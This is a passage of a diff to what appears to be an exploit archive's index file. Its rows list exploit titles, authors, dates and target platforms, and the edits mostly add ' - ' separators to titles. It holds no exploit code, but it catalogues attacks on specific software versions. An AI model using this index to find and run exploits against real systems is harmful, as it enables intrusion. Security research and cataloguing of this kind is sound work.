Cross-Site Scripting Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 +21526,platforms/php/webapps/21526.txt,"MyHelpDesk 20020509 - Cross-Site Scripting Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21527,platforms/php/webapps/21527.txt,"MyHelpDesk 20020509 SQL Injection Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21528,platforms/php/webapps/21528.txt,"Geeklog 1.3.5 Calendar Event Form Script Injection Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21529,platforms/php/webapps/21529.txt,"W-Agora 4.1.x - Remote File Include Vulnerability",2002-06-10,frog,php,webapps,0 @@ -18781,7 +18781,7 @@ id,file,description,date,author,platform,type,port 21536,platforms/windows/dos/21536.jsp,"Macromedia JRun 3/4 JSP Engine Denial of Service Vulnerability",2002-06-12,"Marc Schoenefeld",windows,dos,0 21537,platforms/linux/dos/21537.c,"Ayman Akt IRCIT 0.3.1 Invite Message Remote Buffer Overflow Vulnerability",2002-06-12,gobbles,linux,dos,0 21538,platforms/linux/local/21538.c,"Richard Gooch SimpleInit 2.0.2 Open File Descriptor Vulnerability",2002-06-12,"Patrick Smith",linux,local,0 -21539,platforms/multiple/dos/21539.c,"Netscape 4.x/6.x,Mozilla 0.9.x Malformed Email POP3 Denial of Service Vulnerability",2002-06-12,eldre8,multiple,dos,0 +21539,platforms/multiple/dos/21539.c,"Netscape 4.x/6.x,Mozilla 0.9.x Malformed Email POP3 - Denial of Service Vulnerability",2002-06-12,eldre8,multiple,dos,0 21540,platforms/windows/dos/21540.txt,"Microsoft SQL Server 2000 SQLXML Buffer Overflow Vulnerability",2002-06-12,"Matt Moore",windows,dos,0 21541,platforms/windows/remote/21541.txt,"Microsoft SQL Server 2000 SQLXML Script Injection Vulnerability",2002-06-12,"Matt Moore",windows,remote,0 21542,platforms/windows/remote/21542.c,"AnalogX SimpleServer:WWW 1.16 Web Server Buffer Overflow Vulnerability",2002-06-13,"Auriemma Luigi",windows,remote,0 @@ -18794,10 +18794,10 @@ id,file,description,date,author,platform,type,port 21549,platforms/windows/local/21549.txt,"Microsoft SQL Server 2000 Password Encrypt Procedure Buffer Overflow Vulnerability",2002-06-14,"Martin Rakhmanoff",windows,local,0 21550,platforms/windows/local/21550.txt,"Lumigent Log Explorer XP_LogAttach_StartProf Buffer Overflow Vulnerability",2002-06-14,"Martin Rakhmanoff",windows,local,0 21551,platforms/windows/local/21551.txt,"Lumigent Log Explorer 3.0.1 XP_LogAttach_SetPort Buffer Overflow Vulnerability",2002-06-14,"Martin Rakhmanoff",windows,local,0 -21552,platforms/php/webapps/21552.txt,"PHP Classifieds 6.0.5 Cross-Site Scripting Vulnerability",2002-06-14,windows-1256,php,webapps,0 +21552,platforms/php/webapps/21552.txt,"PHP Classifieds 6.0.5 - Cross-Site Scripting Vulnerability",2002-06-14,windows-1256,php,webapps,0 21553,platforms/cgi/webapps/21553.txt,"Mewsoft NetAuction 3.0 - Cross-Site Scripting Vulnerability",2002-06-14,windows-1256,cgi,webapps,0 21554,platforms/windows/remote/21554.txt,"Imatix Xitami 2.5 GSL Template Cross-Site Scripting Vulnerability",2002-06-14,"Matthew Murphy",windows,remote,0 -21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 Cross-Site Scripting Vulnerability",2002-06-14,"Dave Palumbo",windows,remote,0 +21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting Vulnerability",2002-06-14,"Dave Palumbo",windows,remote,0 21556,platforms/windows/dos/21556.txt,"Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service",2002-06-15,"Oleg A. Cheremisin",windows,dos,0 21557,platforms/php/webapps/21557.txt,"Zeroboard 4.1 PHP Include File Arbitrary Command Execution Vulnerability",2002-06-15,onlooker,php,webapps,0 21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 MagicCard.CGI Arbitrary File Disclosure Vulnerability",2002-06-15,cult,cgi,webapps,0 @@ -18819,7 +18819,7 @@ id,file,description,date,author,platform,type,port 21574,platforms/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun Vulnerability",2002-06-21,"David Rude II",unix,remote,0 21575,platforms/multiple/dos/21575.txt,"Mod_SSL 2.8.x Off-By-One HTAccess Buffer Overflow Vulnerability",2002-06-22,"Frank DENIS",multiple,dos,0 21576,platforms/windows/remote/21576.txt,"Working Resources BadBlue 1.7 EXT.DLL Cross-Site Scripting Vulnerability",2002-06-23,"Matthew Murphy",windows,remote,0 -21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 Buffer Overflow Vulnerability",2002-11-06,watercloud,hp-ux,local,0 +21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow Vulnerability",2002-11-06,watercloud,hp-ux,local,0 21578,platforms/unix/remote/21578.txt,"OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)",2002-06-24,"Christophe Devine",unix,remote,0 21579,platforms/unix/remote/21579.txt,"OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)",2002-06-24,"Gobbles Security",unix,remote,0 21580,platforms/linux/dos/21580.txt,"Inktomi Traffic Server 4/5 Traffic_Manager Path Argument Buffer Overflow",2002-06-25,"Juliano Rizzo",linux,dos,0 @@ -18830,7 +18830,7 @@ id,file,description,date,author,platform,type,port 21585,platforms/linux/local/21585.c,"Mandrake 7/8/9,RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (3)",2002-06-29,N4rK07IX,linux,local,0 21586,platforms/linux/remote/21586.txt,"E-Guest 1.1 Server Side Include Arbitrary Command Execution Vulnerability",2002-06-30,DownBload,linux,remote,0 21587,platforms/cgi/webapps/21587.txt,"BBC Education Betsie 1.5 Parserl.PL Cross-Site Scripting Vulnerability",2002-07-01,"Mark Rowe",cgi,webapps,0 -21588,platforms/cgi/webapps/21588.txt,"Blackboard 5.0 Cross-Site Scripting Vulnerability",2002-07-01,"Berend-Jan Wever",cgi,webapps,0 +21588,platforms/cgi/webapps/21588.txt,"Blackboard 5.0 - Cross-Site Scripting Vulnerability",2002-07-01,"Berend-Jan Wever",cgi,webapps,0 21589,platforms/windows/remote/21589.pl,"AnalogX Proxy 4.0 Socks4A Buffer Overflow Vulnerability",2002-07-01,Kanatoko,windows,remote,0 21590,platforms/php/webapps/21590.txt,"PHPAuction 1/2 Unauthorized Administrative Access Vulnerability",2002-07-02,ethx,php,webapps,0 21591,platforms/windows/remote/21591.sh,"ArGoSoft 1.8 Mail Server Directory Traversal Vulnerability",2002-07-06,"team n.finity",windows,remote,0 @@ -18864,7 +18864,7 @@ id,file,description,date,author,platform,type,port 21619,platforms/windows/remote/21619.txt,"AOL Instant Messenger 4.x Unauthorized Actions Vulnerability",2002-07-16,orb,windows,remote,0 21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 WinAmp Plugin Denial of Service Vulnerability",2002-07-16,"Lucas Lundgren",cgi,dos,0 21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 Default Error Page Cross-Site Scripting Vulnerability",2002-07-17,"Peter Gründl",jsp,webapps,0 -21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 Cross-Site Scripting Vulnerability",2002-07-17,Pistone,php,webapps,0 +21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting Vulnerability",2002-07-17,Pistone,php,webapps,0 21623,platforms/linux/local/21623.txt,"Python 1.5.2 Pickle Unsafe eval() Code Execution Vulnerability",2002-07-17,"Jeff Epler",linux,local,0 21624,platforms/linux/local/21624.py,"Python 1.5/1.6/2.0/2.1.x Pickle Class Constructor Arbitrary Code Execution",2002-07-17,"Jeff Epler",linux,local,0 21625,platforms/windows/remote/21625.pl,"Trend Micro InterScan VirusWall for Windows NT 3.52 Space Gap Scan Bypass",2002-07-18,SecuriTeam,windows,remote,0 @@ -18943,7 +18943,7 @@ id,file,description,date,author,platform,type,port 21700,platforms/linux/local/21700.c,"ISDN4Linux 3.1 IPPPD Device String SysLog Format String Vulnerability (1)",2002-08-10,"Gobbles Security",linux,local,0 21701,platforms/linux/local/21701.pl,"ISDN4Linux 3.1 IPPPD Device String SysLog Format String Vulnerability (2)",2002-08-10,"TESO Security",linux,local,0 21702,platforms/asp/webapps/21702.txt,"Midicart ASP Remote Customer Information Retrieval Vulnerability",2002-08-10,"Dimitri Sekhniashvili",asp,webapps,0 -21703,platforms/windows/dos/21703.txt,"Citrix Metaframe for Windows NT 4.0 TSE 1.8 Java ICA Environment DoS",2002-08-11,"Tanin Ehrami",windows,dos,0 +21703,platforms/windows/dos/21703.txt,"Citrix Metaframe for Windows NT 4.0 TSE 1.8 - Java ICA Environment DoS",2002-08-11,"Tanin Ehrami",windows,dos,0 21704,platforms/unix/remote/21704.txt,"W3C CERN httpd 3.0 Proxy Cross-Site Scripting Vulnerability",2002-08-12,"TAKAGI Hiromitsu",unix,remote,0 21705,platforms/windows/remote/21705.txt,"Microsoft Internet Explorer 6.0 File Attachment Script Execution Vulnerability",2002-08-13,http-equiv,windows,remote,0 21706,platforms/linux/remote/21706.txt,"Red Hat Interchange 4.8.x Arbitrary File Read Vulnerability",2002-08-13,anonymous,linux,remote,0 @@ -19007,7 +19007,7 @@ id,file,description,date,author,platform,type,port 21766,platforms/asp/webapps/21766.txt,"FactoSystem Weblog 0.9/1.0/1.1 - Multiple SQL Injection Vulnerabilities",2002-08-31,"Matthew Murphy",asp,webapps,0 21767,platforms/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 Error Page Cross-Site Scripting Vulnerability",2002-09-02,"Matthew Murphy",multiple,remote,0 21768,platforms/cgi/webapps/21768.txt,"Super Site Searcher Remote Command Execution Vulnerability",2002-09-03,luca.ercoli,cgi,webapps,0 -21769,platforms/cgi/webapps/21769.txt,"Aestiva HTML/OS 2.4 Cross-Site Scripting Vulnerability",2002-09-03,eax@3xT.org,cgi,webapps,0 +21769,platforms/cgi/webapps/21769.txt,"Aestiva HTML/OS 2.4 - Cross-Site Scripting Vulnerability",2002-09-03,eax@3xT.org,cgi,webapps,0 21770,platforms/hardware/dos/21770.c,"Cisco VPN 3000 Series Concentrator Client Authentication Denial of Service Vulnerability",2002-09-03,Phenoelit,hardware,dos,0 21771,platforms/unix/local/21771.c,"AFD 1.2.x Working Directory Local Buffer Overflow Vulnerabilities",2002-09-04,eSDee,unix,local,0 21772,platforms/unix/local/21772.pl,"HP Tru64 NLSPATH Environment Variable Local Buffer Overflow Vulnerability (1)",2002-07-03,stripey,unix,local,0 @@ -19094,7 +19094,7 @@ id,file,description,date,author,platform,type,port 21855,platforms/php/webapps/21855.txt,"PHPNuke 6.0/6.5 - Search Form Cross-Site Scripting Vulnerability",2002-09-24,"Mark Grimes",php,webapps,0 21856,platforms/multiple/local/21856.txt,"OpenVms 5.3/6.2/7.x UCX POP Server Arbitrary File Modification Vulnerability",2002-09-25,"Mike Riley",multiple,local,0 21857,platforms/linux/remote/21857.pl,"Monkey HTTP Server 0.1.4 File Disclosure Vulnerability",2002-09-25,DownBload,linux,remote,0 -21858,platforms/linux/remote/21858.txt,"ACWeb 1.14/1.8 Cross-Site Scripting Vulnerability",2002-09-25,DownBload,linux,remote,0 +21858,platforms/linux/remote/21858.txt,"ACWeb 1.14/1.8 - Cross-Site Scripting Vulnerability",2002-09-25,DownBload,linux,remote,0 21859,platforms/php/webapps/21859.txt,"PHPNuke 6.0 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 21860,platforms/php/webapps/21860.txt,"NPDS 4.8 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 21861,platforms/php/webapps/21861.txt,"DaCode 1.2 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 @@ -19148,12 +19148,12 @@ id,file,description,date,author,platform,type,port 21910,platforms/windows/remote/21910.txt,"Microsoft IIS 5.0 IDC Extension Cross-Site Scripting Vulnerability",2002-10-05,Roberto,windows,remote,0 21911,platforms/multiple/dos/21911.txt,"Oracle 9i Application Server 9.0.2 Web Cache Administration Tool Denial of Service Vulnerability",2002-10-06,@stake,multiple,dos,0 21912,platforms/php/webapps/21912.txt,"Killer Protection 1.0 Information Disclosure Vulnerability",2002-10-07,frog,php,webapps,0 -21913,platforms/windows/remote/21913.txt,"Citrix Published Applications Information Disclosure Vulnerability",2002-10-07,wire,windows,remote,0 +21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure Vulnerability",2002-10-07,wire,windows,remote,0 21914,platforms/asp/webapps/21914.txt,"SSGBook 1.0 Image Tag HTML Injection Vulnerabilities",2002-10-08,frog,asp,webapps,0 21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0 21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - Remote SQL Injection Vulnerability",2002-10-08,hish,php,webapps,0 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse Vulnerability",2002-10-08,netmask,unix,remote,0 -21920,platforms/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability",2002-10-09,overclocking_a_la_abuela,asp,webapps,0 +21920,platforms/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 - Cross-Site Scripting Vulnerability",2002-10-09,overclocking_a_la_abuela,asp,webapps,0 21921,platforms/php/webapps/21921.txt,"VBZoom 1.0 - Arbitrary File Upload Vulnerability",2002-10-09,hish,php,webapps,0 21922,platforms/windows/local/21922.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation Vulnerability (1)",2002-10-09,Serus,windows,local,0 21923,platforms/windows/local/21923.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation Vulnerability (2)",2002-10-09,Serus,windows,local,0 @@ -19435,7 +19435,7 @@ id,file,description,date,author,platform,type,port 22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability",2003-01-26,"Jouko Pynnönen",linux,remote,0 22206,platforms/php/webapps/22206.txt,"Nukebrowser 2.x - Remote File Include Vulnerability",2003-01-30,Havenard,php,webapps,0 22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 Malformed HTTP Request DoS Vulnerability",2003-01-30,"Nathan Neulinger",multiple,dos,0 -22208,platforms/php/webapps/22208.txt,"myphpPageTool 0.4.3 -1 - Remote File Include Vulnerability",2003-02-03,frog,php,webapps,0 +22208,platforms/php/webapps/22208.txt,"myphpPageTool 0.4.3-1 - Remote File Include Vulnerability",2003-02-03,frog,php,webapps,0 22209,platforms/php/webapps/22209.txt,"phpMyShop 1.0 compte.php SQL Injection Vulnerability",2003-02-03,frog,php,webapps,0 22210,platforms/openbsd/local/22210.txt,"OpenBSD 2.x/3.x CHPass Temporary File Link File Content Revealing Vulnerability",2003-02-03,"Marc Bevand",openbsd,local,0 22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 Avatar HTML Injection Vulnerability",2003-02-03,delusion,php,webapps,0 @@ -19531,7 +19531,7 @@ id,file,description,date,author,platform,type,port 22303,platforms/windows/dos/22303.pl,"Microsoft Windows Help program (WinHlp32.exe) Crash PoC",2012-10-28,coolkaveh,windows,dos,0 22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",2012-10-28,metasploit,multiple,remote,0 22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow",2012-10-29,metasploit,windows,remote,0 -22306,platforms/windows/remote/22306.rb,"HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow",2012-10-29,metasploit,windows,remote,0 +22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow",2012-10-29,metasploit,windows,remote,0 22310,platforms/windows/dos/22310.txt,"Microsoft Office Publisher 2010 Crash PoC",2012-10-28,coolkaveh,windows,dos,0 22311,platforms/cgi/remote/22311.txt,"Axis Communications Video Server 2.x Command.CGI File Creation Vulnerability",2003-02-28,"Martin Eiszner",cgi,remote,0 22312,platforms/cgi/remote/22312.txt,"Apple QuickTime/Darwin Streaming Server 4.1.x parse_xml.cgi File Disclosure Vulnerability",2003-02-28,"Joe Testa",cgi,remote,0 @@ -19792,7 +19792,7 @@ id,file,description,date,author,platform,type,port 22573,platforms/freebsd/local/22573.pl,"ListProc 8.2.9 Catmail ULISTPROC_UMASK Buffer Overflow Vulnerability",2003-05-08,kf,freebsd,local,0 22574,platforms/freebsd/local/22574.pl,"Lgames LTris 1.0.1 - Local Memory Corruption Vulnerability",2003-05-09,"Knud Erik Hojgaard",freebsd,local,0 22575,platforms/windows/remote/22575.txt,"Internet Explorer 5/6 file:// Request Zone Bypass Vulnerability",2003-05-09,"Marek Bialoglowy",windows,remote,0 -22576,platforms/windows/dos/22576.txt,"Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 Buffer Overrun Vulnerability",2003-05-09,cesaro,windows,dos,0 +22576,platforms/windows/dos/22576.txt,"Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 - Buffer Overrun Vulnerability",2003-05-09,cesaro,windows,dos,0 22577,platforms/php/webapps/22577.txt,"ttCMS 2.2 / ttForum 1.1 News.php template Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22578,platforms/php/webapps/22578.txt,"ttCMS 2.2 / ttForum 1.1 install.php installdir Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22579,platforms/php/webapps/22579.txt,"Phorum 3.4.x Message Form Field HTML Injection Variant Vulnerability",2003-05-09,WiciU,php,webapps,0 @@ -19864,7 +19864,7 @@ id,file,description,date,author,platform,type,port 22645,platforms/linux/local/22645.c,"Ifenslave 0.0.7 Argument Local Buffer Overflow Vulnerability (3)",2003-05-26,"Julien L",linux,local,0 22646,platforms/unix/remote/22646.txt,"Vignette 4.x/5.0 Memory Disclosure Vulnerability",2003-05-26,S21Sec,unix,remote,0 22647,platforms/hardware/dos/22647.txt,"D-Link DI-704P Syslog.HTM Denial of Service Vulnerability",2003-05-26,"Chris R",hardware,dos,0 -22648,platforms/unix/remote/22648.txt,"Vignette 4/5 Cross-Site Scripting Vulnerabilities",2003-05-26,"Ramon Pinuaga Cascales",unix,remote,0 +22648,platforms/unix/remote/22648.txt,"Vignette 4/5 - Cross-Site Scripting Vulnerabilities",2003-05-26,"Ramon Pinuaga Cascales",unix,remote,0 22649,platforms/multiple/remote/22649.txt,"P-News 1.16 Administrative Account Creation Vulnerability",2003-05-24,"Peter Winter-Smith",multiple,remote,0 22650,platforms/multiple/dos/22650.py,"BRS WebWeaver 1.0 4 POST and HEAD Denial of Service Vulnerability",2003-05-26,euronymous,multiple,dos,0 22651,platforms/php/webapps/22651.txt,"PostNuke 0.72x Phoenix Glossary Module SQL Injection Vulnerability",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 @@ -19885,7 +19885,7 @@ id,file,description,date,author,platform,type,port 22666,platforms/windows/dos/22666.txt,"Softrex Tornado WWW-Server 1.2 - Buffer Overflow Vulnerability",2003-05-28,D4rkGr3y,windows,dos,0 22667,platforms/windows/dos/22667.txt,"BaSoMail 1.24 POP3 Server Denial of Service Vulnerability",2003-05-28,"Ziv Kamir",windows,dos,0 22668,platforms/windows/dos/22668.txt,"BaSoMail 1.24 SMTP Server Command Buffer Overflow Vulnerability",2003-05-28,"Ziv Kamir",windows,dos,0 -22669,platforms/cgi/webapps/22669.txt,"Bandmin 1.4 Cross-Site Scripting Vulnerability",2003-05-28,"silent needel",cgi,webapps,0 +22669,platforms/cgi/webapps/22669.txt,"Bandmin 1.4 - Cross-Site Scripting Vulnerability",2003-05-28,"silent needel",cgi,webapps,0 22670,platforms/windows/remote/22670.c,"Microsoft IIS 5 WebDAV PROPFIND and SEARCH Method Denial of Service Vulnerability",2003-05-28,Neo1,windows,remote,0 22671,platforms/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 URI Parameter File Disclosure Vulnerability",2003-05-29,pokleyzz,php,webapps,0 22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Include Vulnerability",2003-05-29,pokleyzz,php,webapps,0 @@ -19898,7 +19898,7 @@ id,file,description,date,author,platform,type,port 22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 Crash PoC",2012-11-13,coolkaveh,windows,dos,0 22680,platforms/windows/dos/22680.txt,"IrfanView RLE Image Decompression Buffer Overflow Vulnerability",2012-11-13,"Francis Provencher",windows,dos,0 22681,platforms/windows/dos/22681.txt,"IrfanView TIF Image Decompression Buffer Overflow Vulnerability",2012-11-13,"Francis Provencher",windows,dos,0 -22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 +22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow Vulnerabilities",2012-11-13,Vulnerability-Lab,windows,dos,0 22686,platforms/php/remote/22686.rb,"Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution",2012-11-13,metasploit,php,remote,0 @@ -19981,7 +19981,7 @@ id,file,description,date,author,platform,type,port 22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 User.PHP UNAME Cross-Site Scripting Vulnerability",2003-06-13,"David F. Madrid",php,webapps,0 22768,platforms/linux/local/22768.pl,"ATFTP 0.7 - Timeout Command Line Argument Local Buffer Overflow Vulnerability",2003-06-06,"Julien LANTHEA",linux,local,0 22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server File Disclosure Vulnerability",2003-06-13,"Peter Winter-Smith",windows,remote,0 -22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 Cross-Site Scripting Vulnerability",2003-06-12,badpack3t,cgi,webapps,0 +22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting Vulnerability",2003-06-12,badpack3t,cgi,webapps,0 22771,platforms/linux/remote/22771.txt,"Adobe Acrobat Reader (UNIX) 5.0 6,Xpdf 0.9x Hyperlinks Arbitrary Command Execution",2003-06-13,"Martyn Gilmore",linux,remote,0 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution Vulnerability",2003-06-12,badpack3t,cgi,webapps,0 22773,platforms/linux/local/22773.c,"Progress Database 9.1 Environment Variable Local Privilege Escalation Vulnerability",2003-06-14,kf,linux,local,0 @@ -20055,12 +20055,12 @@ id,file,description,date,author,platform,type,port 22841,platforms/php/webapps/22841.txt,"iXmail 0.2/0.3 iXmail_NetAttach.PHP File Deletion Vulnerability",2003-06-26,leseulfrog,php,webapps,0 22842,platforms/php/webapps/22842.txt,"CutePHP CuteNews 1.3 HTML Injection Vulnerability",2003-06-29,"Peter Winter-Smith",php,webapps,0 22843,platforms/cgi/webapps/22843.txt,"MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities",2003-06-29,"Morning Wood",cgi,webapps,0 -22844,platforms/windows/dos/22844.html,"Opera 7 Denial of Service Vulnerabilities",2003-06-30,Operash,windows,dos,0 +22844,platforms/windows/dos/22844.html,"Opera 7 - Denial of Service Vulnerabilities",2003-06-30,Operash,windows,dos,0 22845,platforms/php/webapps/22845.txt,"PABox 1.6 Password Reset Vulnerability",2003-06-30,silentscripter,php,webapps,0 22846,platforms/linux/dos/22846.pl,"Adobe Unix Acrobat Reader 4.0/5.0 WWWLaunchNetscape Buffer Overflow Vulnerability",2003-07-01,"Paul Szabo",linux,dos,0 22847,platforms/linux/local/22847.txt,"InterSystems Cache 4.1.15/5.0.x Insecure Default Permissions Vulnerability",2003-07-01,"Larry W. Cashdollar",linux,local,0 22848,platforms/linux/remote/22848.c,"ezbounce 1.0/1.5 Format String Vulnerability",2003-07-01,V9,linux,remote,0 -22849,platforms/jsp/webapps/22849.txt,"Verity K2 Toolkit 2.20 Cross-Site Scripting Vulnerability",2003-07-02,"SSR Team",jsp,webapps,0 +22849,platforms/jsp/webapps/22849.txt,"Verity K2 Toolkit 2.20 - Cross-Site Scripting Vulnerability",2003-07-02,"SSR Team",jsp,webapps,0 22850,platforms/windows/dos/22850.txt,"Microsoft Office OneNote 2010 Crash PoC",2012-11-20,coolkaveh,windows,dos,0 22851,platforms/windows/local/22851.py,"FormatFactory 3.0.1 - Profile File Handling Buffer Overflow",2012-11-20,"Julien Ahrens",windows,local,0 22852,platforms/multiple/webapps/22852.txt,"SonicWALL CDP 5040 6.x - Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,multiple,webapps,0 @@ -20112,7 +20112,7 @@ id,file,description,date,author,platform,type,port 22899,platforms/windows/dos/22899.txt,"StarSiege Tribes Server Denial of Service Vulnerability (1)",2003-06-10,st0ic,windows,dos,0 22900,platforms/windows/dos/22900.php,"StarSiege Tribes Server Denial of Service Vulnerability (2)",2003-07-14,st0ic,windows,dos,0 22901,platforms/php/webapps/22901.txt,"BlazeBoard 1.0 Information Disclosure Vulnerability",2003-07-14,JackDaniels,php,webapps,0 -22902,platforms/linux/dos/22902.sh,"lighttpd 1.4.31 Denial of Service PoC",2012-11-22,t4c,linux,dos,0 +22902,platforms/linux/dos/22902.sh,"lighttpd 1.4.31 - Denial of Service PoC",2012-11-22,t4c,linux,dos,0 22903,platforms/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution",2012-11-22,metasploit,windows,remote,0 22904,platforms/linux/dos/22904.py,"TrouSerS Denial of Service Vulnerability",2012-11-23,"Andy Lutomirski",linux,dos,0 22905,platforms/windows/remote/22905.rb,"Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow",2012-11-24,metasploit,windows,remote,0 @@ -20125,7 +20125,7 @@ id,file,description,date,author,platform,type,port 22912,platforms/unix/local/22912.c,"IBM UniVerse 10.0.0.9 - uvadmsh Privilege Escalation Vulnerability",2003-07-16,kf,unix,local,0 22917,platforms/windows/remote/22917.txt,"Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability",2003-08-11,aT4r@3wdesign.es,windows,remote,0 22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow Vulnerability",2003-07-16,kf,unix,dos,0 -22919,platforms/windows/remote/22919.txt,"Microsoft ISA Server 2000 Cross-Site Scripting Vulnerabilities",2003-07-16,"Brett Moore",windows,remote,0 +22919,platforms/windows/remote/22919.txt,"Microsoft ISA Server 2000 - Cross-Site Scripting Vulnerabilities",2003-07-16,"Brett Moore",windows,remote,0 22920,platforms/unix/dos/22920.txt,"IBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow Vulnerability",2003-07-16,kf,unix,dos,0 22921,platforms/asp/webapps/22921.txt,".netCART Settings.XML Information Disclosure Vulnerability",2003-07-16,G00db0y,asp,webapps,0 22922,platforms/php/webapps/22922.txt,"Ultimate Bulletin Board 6.0/6.2 UBBER Cookie HTML Injection Vulnerability",2003-07-16,anti_acid,php,webapps,0 @@ -20143,7 +20143,7 @@ id,file,description,date,author,platform,type,port 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability",2012-11-26,LiquidWorm,php,webapps,0 22938,platforms/linux/dos/22938.py,"mcrypt <= 2.6.8 stack-based Buffer Overflow PoC",2012-11-26,_ishikawa,linux,dos,0 22939,platforms/unix/local/22939.pl,"GNU GNATS 3.113.1_6 - Queue-PR Database Command Line Option Buffer Overflow Vulnerability",2003-07-21,inv[at]dtors,unix,local,0 -22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0 +22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0 22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal Vulnerability",2003-07-21,gr00vy,php,webapps,0 22942,platforms/php/webapps/22942.txt,"WebCalendar 0.9.x - Local File Include Information Disclosure Vulnerability",2003-07-21,noconflic,php,webapps,0 22943,platforms/linux/local/22943.c,"Top 1.x/2.0 Home Environment Variable Local Buffer Overflow Vulnerability",2003-07-22,UHAGr,linux,local,0 @@ -20346,7 +20346,7 @@ id,file,description,date,author,platform,type,port 23146,platforms/windows/dos/23146.c,"Alt-N MDaemon Server 2.71 SP1 SMTP HELO Argument Buffer Overflow Vulnerability",1999-03-10,Rootshell,windows,dos,0 23147,platforms/windows/remote/23147.txt,"Nokia Electronic Documentation 5.0 - Directory Disclosure Vulnerability",2003-09-15,@stake,windows,remote,0 23148,platforms/windows/remote/23148.txt,"Nokia Electronic Documentation 5.0 Connection Redirection Vulnerability",2003-09-15,@stake,windows,remote,0 -23149,platforms/windows/remote/23149.txt,"Nokia Electronic Documentation 5.0 Cross-Site Scripting Vulnerability",2003-09-15,"Ollie Whitehouse",windows,remote,0 +23149,platforms/windows/remote/23149.txt,"Nokia Electronic 